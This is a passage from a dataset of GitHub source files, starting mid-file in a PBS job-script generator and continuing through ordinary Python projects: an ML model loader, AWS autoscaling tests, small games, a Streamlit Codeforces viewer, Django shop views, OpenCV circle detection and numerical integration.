Y to register shell script, otherwise enter N >> \"))\n if regist == 'Y' :\n path = self.shellpath + \"/{}.sh\".format(shell['shell_name'])\n break\n elif regist == 'N' :\n path = \"{}.sh\".format(shell['shell_name'])\n break\n else :\n print(\"Please Enter Y or N\")\n\n with open(path,'w') as sh :\n sh.write(\"#!/bin/sh\\n\")\n sh.write(\"# control options #\\n\")\n sh.write(\"#PBS -N {} \\n\".format(shell['shell_name']))\n sh.write(\"#PBS -l nodes={}:ppn={}:{}\\n\".format(shell['node'],shell['ppn'],shell['node_name']))\n sh.write(\"########\\n\")\n sh.write(\"#PBS -q {}\\n\".format(shell['node_name']))\n sh.write(\"#PBS -o out.log\\n\")\n sh.write(\"#PBS -j oe\\n\")\n \n sh.write(\"\\n# PATH & EXE\\n\")\n sh.write(\"EXE='{}'\\n\".format(shell['vasp_std']))\n sh.write(\"#EXE='{}'\\n\".format(shell['vasp_ncl']))\n sh.write(\"#EXE='{}'\\n\".format(shell['vasp_gam']))\n \n sh.write(\"\\n#\\n\")\n sh.write(\"NUMBER=`cat $PBS_NODEFILE | wc -l`\\n\")\n sh.write(\"cd $PBS_O_WORKDIR\\n\")\n \n sh.write(\"\\n# run \\n\")\n sh.write(\"echo job started at `date` >> time\\n\")\n sh.write(\"{} -np $NUMBER -machinefile $PBS_NODEFILE $EXE > $PBS_JOBNAME.out\\n\".format(shell['mpi_command']))\n sh.write(\"echo job ended at `date` >> time\\n\")\n \n sh.close()","repo_name":"jgp505/perovgen","sub_path":"pygmd/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"28142041021","text":"import boto3\nfrom boto3.session import Session\nfrom boto3.dynamodb.conditions import Key, Attr\nimport os\nimport pickle\nfrom io import BytesIO\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder, LabelEncoder, LabelBinarizer,MultiLabelBinarizer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.model_selection import train_test_split, GridSearchCV, KFold\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import svm\nfrom sklearn.model_selection import cross_val_score,StratifiedKFold, cross_validate\nfrom sklearn.metrics import classification_report, f1_score, accuracy_score, precision_score, recall_score, roc_auc_score\nfrom sklearn.decomposition import PCA\nfrom sklearn.base import BaseEstimator, TransformerMixin\nimport pandas as pd\nimport DynamoDBClient\n\ndynamodb = boto3.resource('dynamodb')\nclient = boto3.client('dynamodb', region_name='eu-west-2')\ns3 = boto3.resource('s3')\n\nACCESS_KEY = os.environ['AWS_ACCESS_KEY_ID']\nSECRET_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\nAWS_DEFAULT_REGION = os.environ['AWS_DEFAULT_REGION']\n\n\nclass ML():\n\n def __init__(self):\n\n with BytesIO() as data:\n s3.Bucket(\"artificial-demo\").download_fileobj(\"xgb.pkl\", data)\n data.seek(0) # move back to the beginning after writing\n self.xgb = pickle.load(data)\n \n db = DynamoDBClient.DynamoDB(db_name = \"customer\")\n self.data = pd.DataFrame(db.get_all_items())\n\n print(\"----------------------------------------\")\n print(self.data.tail(1))\n \n def predict(self):\n\n\n y_pred=self.xgb.predict([self.X[-1]])\n y_proba=self.xgb.predict_proba([self.X[-1]])\n print(y_pred)\n print(y_proba)\n\n return y_pred,y_proba\n \n def pre_process(self, data):\n print(\"####### PRE-PROCESSING ###########\")\n #Numeric Features\n numeric_features= list(data.columns[data.dtypes == 'int64'])\n scaler = StandardScaler()\n scaled_data = scaler.fit_transform(data[numeric_features])\n scaled_data = pd.DataFrame(data=scaled_data, columns=numeric_features)\n\n #Binary Features\n binary_features = [\"default\", \"housing\", \"loan\", \"y\"]\n lb = BinaryTransformer()\n binarised_features = lb.fit_transform(data[binary_features])\n\n # Multioutput Features\n categorical_features = list(set(list(data.columns[data.dtypes == 'object'])) - set(binarised_features))\n ohe_data = pd.get_dummies(data[categorical_features])\n new_categorical_features = ohe_data.columns\n\n cleaned_data = pd.concat([scaled_data, binarised_features, ohe_data], axis=1)\n\n \n self.X = cleaned_data.drop('y', axis=1)\n self.y = cleaned_data['y']\n \n print(\"####### REEEE ###########\")\n print(self.X.shape)\n\n pca = PCA(n_components=32)\n self.X = pca.fit_transform(self.X)\n print(self.X.shape)\n\n self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size=0.2, stratify=self.y)\n\n\n\nclass BinaryTransformer( BaseEstimator, TransformerMixin ):\n #Class Constructor \n def __init__(self):\n pass\n \n #Return self nothing else to do here \n def fit( self, X, y = None ):\n return self \n \n #Method that describes what we need this transformer to do\n def transform( self, X, y = None ):\n self.columns = list(X.columns)\n result = X.copy()\n for c in result.columns:\n result[c] = result[c].apply(lambda x: 1 if x==\"yes\" else 0)\n \n return 
result","repo_name":"lok63/artificial_serverless","sub_path":"machine_learning.py","file_name":"machine_learning.py","file_ext":"py","file_size_in_byte":3643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"25432613834","text":"from datetime import datetime\r\nfrom aws_wrappers import AWS_Wrappers\r\nfrom utility import Utility\r\nutility = Utility()\r\naws_wrappers =AWS_Wrappers()\r\n\r\ndef test_ScheduledActions(ASGName): #TestCase B: Point 1: Find the Scheduled actions of given ASG which is going to run next and calcalate elapsed in hh:mm:ss from current time.\r\n try:\r\n scheduled_action_details = aws_wrappers.get_scheduled_actions(ASGName) # Get the sheduled actions of ASG\r\n scheduled_actions_list = scheduled_action_details.scheduled_update_group_actions #List of Scheduled of scheduled actions\r\n if len(scheduled_actions_list) == 0:\r\n print(\"No Scheduled Actions found\")\r\n assert False\r\n\r\n scheduled_action_recurrence={}\r\n try:\r\n for scheduled_action in scheduled_actions_list:\r\n # Get the next running time from Cron Expression and get the time delta between now and cron expression time\r\n scheduled_action_recurrence[scheduled_action.scheduled_action_name] = (utility.get_next_schedule_from_cron(scheduled_action.recurrence)-datetime.now()).total_seconds()\r\n\r\n next_running_job= min(scheduled_action_recurrence, key=scheduled_action_recurrence.get) # Get the minimum time of jobs which is nothing but latest job to run\r\n print(\"Job to Run Next : \" + next_running_job)\r\n except KeyError:\r\n pass ## if job is non recurring\r\n try:\r\n ## To find elapsed time from now from previous ran all jobs\r\n for scheduled_action in scheduled_actions_list:\r\n action_name= scheduled_action.scheduled_action_name # Get all action name list\r\n time_elapsed = datetime.now() - utility.get_previous_schedule_from_cron(scheduled_action.recurrence) # Get time of previous run from Cron\r\n print(\"Time Elapsed: \" + action_name + \" \"+str(time_elapsed)) ## prints elapsed time in hh:mm:ss\r\n assert True\r\n except KeyError:\r\n pass ## if job is non recurring\r\n except Exception as e:\r\n assert False\r\n\r\ndef test_ScalingDayActivity(ASGName):\r\n try:\r\n scaling_activities = aws_wrappers.describe_scaling_activities(ASGName) # Get all scaling activities result\r\n today_activities= []\r\n for activities in scaling_activities:\r\n for act in activities:\r\n start_date = act['StartTime'].date() # get the start time of the instance\r\n status = act['StatusCode']\r\n if start_date == datetime.now().date() and status == 'Successful': # Get the activities of today wich are success\r\n today_activities.append(act['ActivityId'])\r\n if len(today_activities)==0:\r\n print(\"No instances Launched or Terminated today\")\r\n assert False\r\n else:\r\n print (str(len(today_activities))+ \" instances launched or terminated today\")\r\n assert True\r\n except Exception as e:\r\n print(str(e))\r\n assert False\r\n\r\n\r\n","repo_name":"csegourab6/livevox-assignment-task-1","sub_path":"test_ScheduledActions.py","file_name":"test_ScheduledActions.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"75249470180","text":"import random\r\nfrom typing import ParamSpecArgs\r\ndef get_choices():\r\n player_choice=input(\"Choose your choice in(stone,paper,sessor)\")\r\n option=[\"rock\",\"paper\",\"sissor\"]\r\n computer_choice=random.choice(option)\r\n choices={\"player\":player_choice,\"computer\":computer_choice}\r\n return choices\r\ndef dj(player,computer):\r\n print(f\"you choose {player} computer choose {computer}\")\r\n if player==computer:\r\n return \"draw\"\r\n elif player==\"rock\":\r\n if computer==\"paper\":\r\n return \"paper will cover the rock and You lost\"\r\n else:\r\n return \"rock will cut the sissor and You win\"\r\n elif player==\"sissor\":\r\n \r\n if computer==\"paper\":\r\n return \"sissor will cut the paper,You Win\"\r\n else:\r\n return \"rock will broke the sissor,You lost\"\r\n\r\n elif player==\"paper\":\r\n if computer==\"sissor\":\r\n return \"sissor will cut the paper,you lost\"\r\n else:\r\n return \"paper will cover the stone ,you win\"\r\na=get_choices()\r\nresult=dj(a[\"player\"],a[\"computer\"])\r\nprint(result)\r\n","repo_name":"shanmugapandiyan/python-basics","sub_path":"python_simple_game.py","file_name":"python_simple_game.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"23297862150","text":"s = [\"Franta\", \"Pepa\", \"Vašek\", \"Ignác\"]\r\n\r\n\r\ndef od1():\r\n global s\r\n s.append(input(\"napiš další jméno\"))\r\n otazka()\r\n\r\n\r\ndef od2():\r\n global s\r\n print(s)\r\n s.remove(input(\"napis jmeno\"))\r\n otazka()\r\n\r\n\r\ndef od3():\r\n global s\r\n print(s)\r\n otazka()\r\n\r\n\r\ndef od4():\r\n global s\r\n print(\"v seznamu je\", len(s), \"jmen\")\r\n otazka()\r\n\r\n\r\ndef od5():\r\n global s\r\n s.sort()\r\n print(s)\r\n otazka()\r\n\r\n\r\ndef od6():\r\n print(\"ok\")\r\n\r\n\r\ndef otazka():\r\n global s\r\n print(\"1.Pridat jmeno\")\r\n print(\"2.odebrat jmeno\")\r\n print(\"3.vypsat seznam\")\r\n print(\"4.kolik je jmen v seznamu\")\r\n print(\"5.seznam jsem podle abecedy\")\r\n print(\"6.konec programu\")\r\n o = int(input(\"vyber\"))\r\n if o == 1:\r\n od1()\r\n if o == 2:\r\n od2()\r\n if o == 3:\r\n od3()\r\n if o == 4:\r\n od4()\r\n if o == 5:\r\n od5()\r\n elif o == 6:\r\n od6()\r\n\r\n\r\notazka()\r\n","repo_name":"EducaNet-school/zelvi-grafika-PetrPujman","sub_path":"seznamy/seznamy 6.py","file_name":"seznamy 6.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"42407309987","text":"import altair as alt\nimport datetime\nimport streamlit as st\nimport json\nimport requests\nimport pandas as pd\nimport pycountry as pc\n\n\ndef find_best_matches(strs, s):\n results = []\n for x in strs:\n if s.lower() in x.lower():\n results.append(x)\n if len(results) == 7:\n return results\n return results\n\n\ndef main():\n\n data = []\n handle_tuples = []\n handles = []\n default_index = 0\n with open('codeforces_crawler\\codeforces_crawler\\spiders\\items_codeforces_spider_4.jl') as file:\n for i, line in enumerate(file):\n json_obj = json.loads(line)\n data.append(json_obj)\n handle_tuples.append((json_obj['handle'], i))\n if json_obj['handle'] in 'y0urs3lf':\n default_index = i\n handles = [t[0] for t in handle_tuples]\n\n st.write(\"# Codeforces User's Profile\")\n\n query = st.text_input(\n \"label\", placeholder=\"Enter a handle you want to find. For example: y0urs3lf\", label_visibility='hidden')\n\n selected_handle = \"\"\n\n # and ((not 'check' in st.session_state) or st.session_state['check'] == False):\n button_frames = []\n if query != \"\":\n # Call the search function and display the results\n results = find_best_matches(handles, query)\n if len(results) == 0:\n st.write(\"No results found\")\n else:\n st.write(f'Best results for **{query}**:')\n # (not 'check' in st.session_state) or st.session_state['check'] == False:\n if True:\n for result in results:\n # Display the result as a clickable link\n button_frame = st.empty()\n isClicked = button_frame.button(\n result, use_container_width=True, key=result)\n button_frames.append((button_frame, result))\n if isClicked:\n # Change the context of the page based on the selected result\n # result_frame.empty()\n selected_handle = result\n # st.session_state['check'] = True\n break\n\n if selected_handle != \"\":\n for (frame, handle) in button_frames:\n if handle != selected_handle:\n frame.empty()\n\n index = handles.index(selected_handle)\n\n user_info = data[index]\n rank = user_info['rank'][0:len(user_info['rank'])-1]\n color = get_color(rank)\n cur_handle = user_info[\"handle\"]\n\n st.markdown(\n f'
{rank.title()}
{cur_handle}
', unsafe_allow_html=True)\n\n # flag image and country\n country = user_info[\"country\"]\n if country != \"\":\n country_code = get_country_code(country).lower()\n image_url = f'https://codeforces.org/s/33207/images/flags-16/{country_code}.png'\n st.markdown(\n f'
{country}
',\n unsafe_allow_html=True\n )\n else:\n st.markdown(\n f'
{country}
',\n unsafe_allow_html=True\n )\n\n # rating\n st.markdown(\n f'
Rating:{str(user_info[\"rating\"])}
',\n unsafe_allow_html=True\n )\n\n # max rating\n max_rating_color = get_color(user_info[\"max_rank\"])\n st.markdown(\n f'
Max Rating: {str(user_info[\"max_rating\"])}, {user_info[\"max_rank\"].title()}', unsafe_allow_html=True\n )\n\n # request data to render the chart\n # return\n url = f\"https://codeforces.com/api/user.rating?handle={selected_handle}\"\n response = requests.get(url).json()\n\n if response[\"status\"] == \"OK\":\n data = response[\"result\"]\n\n contestName, rating, time, rank = [], [], [], []\n for x in data:\n contestName.append(x.get(\"contestName\"))\n rating.append(x.get(\"newRating\"))\n\n # convert time from unix-format -> date\n timestamp = x.get(\"ratingUpdateTimeSeconds\")\n dt_object = datetime.datetime.fromtimestamp(timestamp)\n formatted_date = dt_object.strftime('%Y-%m-%d')\n time.append(formatted_date)\n\n rank.append(x.get(\"rank\"))\n\n chart_data = pd.DataFrame(\n {\n 'contestName': contestName,\n 'rating': rating,\n 'time': time,\n 'rank': rank,\n })\n\n # altair support rendering chart with limit value in the axis\n y_min = max(0, min(chart_data[\"rating\"]) - 100)\n y_max = max(chart_data[\"rating\"]) + 100\n\n scale = alt.Scale(domain=(y_min, y_max))\n\n chart = alt.Chart(chart_data).mark_line(\n point=alt.OverlayMarkDef(\n size=50, filled=False, color=\"#4A55A2\", fill=\"#A0BFE0\"), # properties of the point\n color=\"#A0BFE0\" # color of the line\n ).encode(\n x='time:T', # the :T is added to display x-axis as Time, not String => more interactive\n # the alt.y is added to show the points in certain range\n y=alt.Y('rating', scale=scale),\n tooltip=['contestName', 'rank'],\n ).interactive()\n\n # Render the chart using Streamlit\n st.altair_chart(chart, use_container_width=True)\n else:\n st.write(\"**Error:**\", response[\"comment\"])\n else:\n pass\n\n\ndef get_color(rank):\n if rank == \"legendary grandmaster\":\n return \"black\"\n if rank == \"international grandmaster\":\n return \"red\"\n if rank == \"grandmaster\":\n return \"red\"\n if rank == \"international master\":\n return \"orange\"\n if rank == \"master\":\n return \"orange\"\n if rank == \"candidate master\":\n return \"purple\"\n if rank == \"expert\":\n return \"blue\"\n if rank == \"specialist\":\n return \"cyan\"\n if rank == \"pupil\":\n return \"green\"\n return \"grey\"\n\n\ndef get_country_code(country_name):\n if country_name == \"Vietnam\":\n return \"Vn\"\n if country_name == \"Taiwan\":\n return \"Tw\"\n try:\n country = pc.countries.get(name=country_name)\n return country.alpha_2\n except AttributeError:\n return \"\"\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"pnnam03/codeforces-tools","sub_path":"no_api_cf_user_info.py","file_name":"no_api_cf_user_info.py","file_ext":"py","file_size_in_byte":6746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
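Note that the HTML markup inside the st.markdown f-strings above was stripped somewhere upstream (hence the unsafe_allow_html=True flags and the now-unused image_url); the original tags are not recoverable from this record. Separately, the hard-coded "Vietnam"/"Taiwan" cases in get_country_code exist because pycountry's official names differ ("Viet Nam"). pycountry also offers a fuzzy search covering such variants; a sketch (the behavior of countries.get on a miss varies slightly across pycountry versions, so treat this as an assumption to verify):

import pycountry

def country_code(name):
    country = pycountry.countries.get(name=name)
    if country is None:
        try:
            # fuzzy search handles common variants, e.g. "Vietnam" -> "Viet Nam"
            country = pycountry.countries.search_fuzzy(name)[0]
        except LookupError:
            return ""
    return country.alpha_2

print(country_code("Vietnam"))  # VN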
+{"seq_id":"8095913568","text":"import pygame\nfrom player import Player\n\n# Initialize pygame\npygame.init()\n\n# Create the screen (width, height)\nscreen = pygame.display.set_mode((800, 640))\nprint(\"Hello\")\n\n# Title and Icon\n# Caption is the title of the window\npygame.display.set_caption(\"Jeraldyn\")\n# Icon is the image on the top left of the window\n#icon = pygame.image.load('ufo.png')\n# Set the icon\n#pygame.display.set_icon(icon)\n\n# Player Images\nplayerImg = pygame.image.load('Images/Main-Character/character-0.png')\n\n# Create Instance of player\nplayer = Player()\n\n# Game loop\nrunning = True\n\n# While the game is running\nwhile running:\n\n # Event loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n screen.fill((91,153,139))\n\n #Update the player\n player.update(event)\n \n # Draw the player\n screen.blit(playerImg, (player.playerX, player.playerY))\n\n # Update the screen\n pygame.display.update()","repo_name":"jalenm872/Pygame-Game-One","sub_path":"first-game.py","file_name":"first-game.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"73638295139","text":"from django.db.models import Prefetch, Q\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.urls import reverse\n\nfrom apps.sneaker.models import Sneaker, SneakerSize, Brand\n\nSORT_RULE_MAP = {\n 1: '-click_num',\n 2: '-created_at',\n 3: '-discount_price',\n 4: 'discount_price',\n}\n\n\ndef get_sneakers_sort(sort_rule):\n sort_key = SORT_RULE_MAP[sort_rule]\n return Sneaker.objects.prefetch_related('sneaker_image').filter(is_active=True).order_by(sort_key)\n\n\ndef get_sneakers_with_brand_sort(brand_id, sort_rule):\n sort_key = SORT_RULE_MAP[sort_rule]\n brand = get_object_or_404(Brand, id=brand_id)\n sneakers = Sneaker.objects.filter(\n Q(brand_id=brand_id) & Q(is_active=True)\n ).order_by(sort_key)\n return brand, sneakers\n\n\ndef sneaker_sort_return(request, brand_id, sort_rule):\n if brand_id == 0:\n sneakers = get_sneakers_sort(sort_rule)\n return render(request, 'index.html', {'sneakers': sneakers})\n else:\n brand, sneakers = get_sneakers_with_brand_sort(brand_id, sort_rule)\n return render(request, 'sneaker/brand.html', {'brand': brand, 'sneakers': sneakers})\n\n\ndef sneaker_all(request):\n sneakers = get_sneakers_sort(1)\n return render(request, 'index.html', {'sneakers': sneakers})\n\n\ndef get_recommendation(sneaker_id):\n sneaker = get_object_or_404(Sneaker, id=sneaker_id)\n brand_id = sneaker.brand.id\n brand_sneakers = Sneaker.objects.filter(Q(brand_id=brand_id) & (~Q(id=sneaker_id))).order_by('-click_num')\n return brand_sneakers\n\n\ndef sneaker_detail(request, pk):\n sneaker = get_object_or_404(\n Sneaker.objects.prefetch_related(\n Prefetch('sneaker_size', queryset=SneakerSize.objects.order_by('size'))),\n pk=pk, is_active=True\n )\n\n click_num = sneaker.click_num\n sneaker.click_num = click_num + 1\n sneaker.save()\n\n other_sneakers = get_recommendation(sneaker.id)\n return render(request, 'sneaker/detail.html', {'sneaker': sneaker, 'other_sneakers': other_sneakers})\n\n\ndef brand_detail(request, pk=None):\n brand, sneakers = get_sneakers_with_brand_sort(pk, 1)\n return render(request, 'sneaker/brand.html', {'brand': brand, 'sneakers': sneakers})\n\n\ndef search(request):\n keywords = request.GET.get('keywords')\n sneakers = Sneaker.objects.none()\n if len(keywords) != 0:\n keyword_list = keywords.split()\n for keyword in keyword_list:\n res = Sneaker.objects.filter(Q(brand__name__icontains=keyword) | Q(title__icontains=keyword))\n if len(res) != 0:\n if len(sneakers) == 0:\n sneakers = res\n else:\n sneakers = sneakers & res\n return render(request, 'sneaker/search_result.html', {'sneakers': sneakers})\n","repo_name":"YuboGuo1024/sneaker_mall","sub_path":"apps/sneaker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"7876199752","text":"import os\nimport pytest\nfrom opgee.error import CommandlineError\nfrom opgee.config import IsWindows\nDEVNULL = 'nul' if IsWindows else '/dev/null'\n\nis_sherlock = os.environ.get('LMOD_SYSHOST') == 'sherlock'\n\n@pytest.mark.skipif(is_sherlock, reason=\"requires the graphviz/dot which isn't working on sherlock\")\n@pytest.mark.parametrize(\n \"args\", [\n ['graph', '--classes', 'core', '--classes-output', DEVNULL],\n ['graph', '--field', 'gas_lifting_field', '--field-output', DEVNULL],\n ['graph', '--hierarchy-output', DEVNULL],\n ]\n)\ndef test_graphing(opgee_main, args):\n try:\n opgee_main.run(None, args)\n good = True\n except Exception as e:\n # print(e)\n good = False\n\n assert good\n\n@pytest.mark.skipif(is_sherlock, reason=\"requires the graphviz/dot which isn't working on sherlock\")\ndef test_unknown_field(opgee_main):\n with pytest.raises(CommandlineError, match=r\"Field name .* was not found in model\"):\n opgee_main.run(None, ['graph', '--field', 'unknown-field'])\n","repo_name":"Stanford-EAO/OPGEEv4","sub_path":"tests/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"}
+{"seq_id":"72186346661","text":"from django.conf import settings\nfrom django.views import defaults as default_views\nfrom django.urls import path, re_path\nfrom django.conf.urls.static import static\nfrom adminfeautures.views import (\n user_list_view,\n update_solar_module_preise_view,\n update_wallbox_preise_view,\n update_optional_accessories_preise_view,\n update_andere_konfiguration_werte_view,\n avatar_upload_form,\n delete_user,\n test_delete_selected,\n PasswordUpdateView,\n ViewAdminOrders,\n UpdateAdminAngebot,\n DeleteAngebot,\n UserUpdateView,\n TopVerkauferContainerUpdateView,\n DeleteSelectedAngebots,\n)\n\napp_name = \"adminfeautures\"\n\nurlpatterns = [\n path(\"user-list/\", user_list_view, name=\"user_list\"),\n path(\"user//edit/\", UserUpdateView.as_view(), name=\"user-edit\"),\n path(\n \"user//top-verkaufer-container-update/\",\n TopVerkauferContainerUpdateView.as_view(),\n name=\"top-verkaufer-container-update\",\n ),\n path(\"user//orders/\", ViewAdminOrders.as_view(), name=\"user-orders\"),\n path(\"user//user-update/\", UserUpdateView.as_view(), name=\"user-update\"),\n path(\n \"user//change_password/\",\n PasswordUpdateView.as_view(),\n name=\"change_password\",\n ),\n path(\"user//delete/\", delete_user, name=\"delete_user\"),\n path(\n \"user//orders/\",\n ViewAdminOrders.as_view(),\n name=\"view_admin_orders\",\n ),\n path(\n \"user//orders//\",\n UpdateAdminAngebot.as_view(),\n name=\"update_admin_angebot\",\n ),\n path(\n \"user//orders/delete//\",\n DeleteAngebot.as_view(),\n name=\"delete_angebot\",\n ),\n path(\n \"user//orders/test-delete-selected/\",\n test_delete_selected,\n name=\"test_delete_selected\",\n ),\n path(\n \"user//orders/delete-selected/\",\n DeleteSelectedAngebots.as_view(),\n name=\"delete_selected_angebots\",\n ),\n path(\"user//upload-avatar/\", avatar_upload_form, name=\"upload_avatar\"),\n path(\n \"prices/update_solar_module_preise//\",\n update_solar_module_preise_view,\n name=\"update_solar_module_preise\",\n ),\n path(\n \"prices/update_wallbox_preise//\",\n update_wallbox_preise_view,\n name=\"update_wallbox_preise\",\n ),\n path(\n \"prices/update_optional_accessories_preise//\",\n update_optional_accessories_preise_view,\n name=\"update_optional_accessories_preise\",\n ),\n path(\n \"prices/update_andere_konfiguration_werte//\",\n update_andere_konfiguration_werte_view,\n name=\"update_andere_konfiguration_werte\",\n ),\n re_path(\n r\"^400/$\",\n default_views.bad_request,\n kwargs={\"exception\": Exception(\"Bad Request!\")},\n ),\n re_path(\n r\"^403/$\",\n default_views.permission_denied,\n kwargs={\"exception\": Exception(\"Permission Denied\")},\n ),\n re_path(\n r\"^404/$\",\n default_views.page_not_found,\n kwargs={\"exception\": Exception(\"Page not Found\")},\n ),\n re_path(r\"^500/$\", default_views.server_error),\n]\n\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"teamitjuno/jsh-ubuntu-droplet","sub_path":"adminfeautures/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"74666496740","text":"# Replace every array element by multiplication of previous and next\n# Given an array of integers, update every element with multiplication of previous and next elements with following exceptions.\n# a) First element is replaced by multiplication of first and second.\n# b) Last element is replaced by multiplication of last and second last.\n\ndef MultiplicationPreviousNext(ary):\n\n fnl_lst=[]\n\n for i in range(0,len(ary)):\n if i==0:\n fnl_lst.append(ary[i]*ary[i+1])\n elif i==len(ary)-1:\n fnl_lst.append(ary[i-1]*ary[i])\n else:\n fnl_lst.append(ary[i-1]*ary[i+1])\n\n return fnl_lst\n\ndef main():\n \n ary=[2, 3, 4, 5, 6]\n print(MultiplicationPreviousNext(ary))\n\nif __name__=='__main__':\n main()","repo_name":"ksayee/programming_assignments","sub_path":"python/CodingExercises/MultiplicationPreviousNext.py","file_name":"MultiplicationPreviousNext.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"41106654727","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 2 12:52:01 2020\nCircle Detection inspiration:\nhttps://stackoverflow.com/questions/58109962/how-to-optimize-circle-detection-with-python-opencv\n\n@author: modal\n\"\"\"\n#%% INIT\nimage_file_name = 'a2_a_cropped.jpg'\n\nfrom well_plate_project.config import data_dir\nraw_data_dir = data_dir / 'raw'\npath = raw_data_dir / 'EXPERIMENTS'\nimage_file = raw_data_dir / image_file_name\nassert image_file.is_file()\n\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\n# Load in image, convert to gray scale, and Otsu's threshold\nimage = cv2.imread(str(image_file))\nplt.imshow(image)\nplt.show()\n\noutput = image.copy()\nheight, width = image.shape[:2]\nmaxRadius = int(1.05*(width/14)/2) #12+2\nminRadius = int(0.79*(width/14)/2) #12+2\n\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ncircles = cv2.HoughCircles(image=gray, \n method=cv2.HOUGH_GRADIENT, \n dp=1.2, \n minDist=2*minRadius, #there is no overlapping, you could say that the distance between two circles is at least the diameter, so minDist could be set to something like 2*minRadius.\n param1=50,\n param2=50,\n minRadius=minRadius,\n maxRadius=maxRadius \n )\n\nif circles is not None:\n # convert the (x, y) coordinates and radius of the circles to integers\n circlesRound = np.round(circles[0, :]).astype(\"int\")\n # loop over the (x, y) coordinates and radius of the circles\n for (x, y, r) in circlesRound:\n cv2.circle(output, (x, y), r, (0, 255, 0), 4)\n\n plt.imshow(output)\nelse:\n print ('No circles found')\n\n\n\n#https://stackoverflow.com/questions/58109962/how-to-optimize-circle-detection-with-python-opencv\n\n\n","repo_name":"MthBr/well-plate-light-driven-predictions","sub_path":"well_plate_project/data_etl/backup_test/circle_detection_test2.py","file_name":"circle_detection_test2.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"20232276158","text":"# 5 лаба\nimport numpy as np\nimport matplotlib.pyplot as canvas\nfrom numpy import log as ln\n\n\ndef f(x):\n return (x ** 2) * ln(x)\n\n\ndef f2(x):\n return 2 * ln(x) + 3\n\n\ndef trapecy(x, h, a, b):\n size = len(x)\n res = (f(a) + f(b)) / 2\n for i in range(1, size):\n res += f(x[i])\n return res * h\n\n\ndef simpson(x, h, a, b):\n size = int(len(x) / 2)\n res = (f(a) + 4 * f(a + h) + f(b))\n for i in range(1, size):\n res += 2 * f(x[2 * i]) + 4 * f(x[2 * i + 1])\n return res * h / 3\n\n\na = 1\nb = 2\nd = np.arange(a, b, 0.001)\ncanvas.figure(1)\ncanvas.title(\"2я производная\")\ncanvas.xlabel(\"Х\")\ncanvas.ylabel(\"Y\")\ncanvas.grid()\ncanvas.plot(d, f2(d))\nx_m = 2.0 # максимум 2й производной. Получен графическим методом\nm = f2(x_m) # максимальное значение 2й производной\n# eps = 0.00001\n# h = numpy.sqrt(eps*12/((b-a)*m)) # h = 0.005230482293837083\n# n = (b-a)/h #n = 192 (на самом деле 191.186958...., но берем 192 т.к. кратно 4) 192/4 = 48\nh = (b - a) / 192\nxh = np.arange(a, b, h)\nx2h = np.arange(a, b, 2 * h)\ntrapecy1 = trapecy(xh, h, a, b)\ntrapecy2 = trapecy(x2h, 2 * h, a, b)\nsimpson1 = simpson(xh, h, a, b)\nsimpson2 = simpson(x2h, 2 * h, a, b)\nexact = 1.070614703715409714001507879444 # точный результат\nprint(\"Метод трапеций:\")\nprint(\"\\tРезультат с шагом h ► \" + str(trapecy1) + \"\\n\\t\\tс шагом 2h ► \" + str(trapecy2))\nprint(\"\\tСравнение с точным ► \" + str(abs(exact - trapecy1)))\nprint(\"\\tПогрешность по Рунге ► \" + str(abs(trapecy2 - trapecy1) / 3))\nprint(\"Метода Симпсона:\")\nprint(\"\\tРезультат с шагом h ► \" + str(simpson1) + \"\\n\\t\\tс шагом 2h ► \" + str(simpson2))\nprint(\"\\tСравнение с точным ► \" + str(abs(exact - simpson1)))\nprint(\"\\tПогрешность по Рунге ► \" + str(abs(simpson2 - simpson1) / 15))\ncanvas.show()\n","repo_name":"MalyshkinMike/Gubar","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
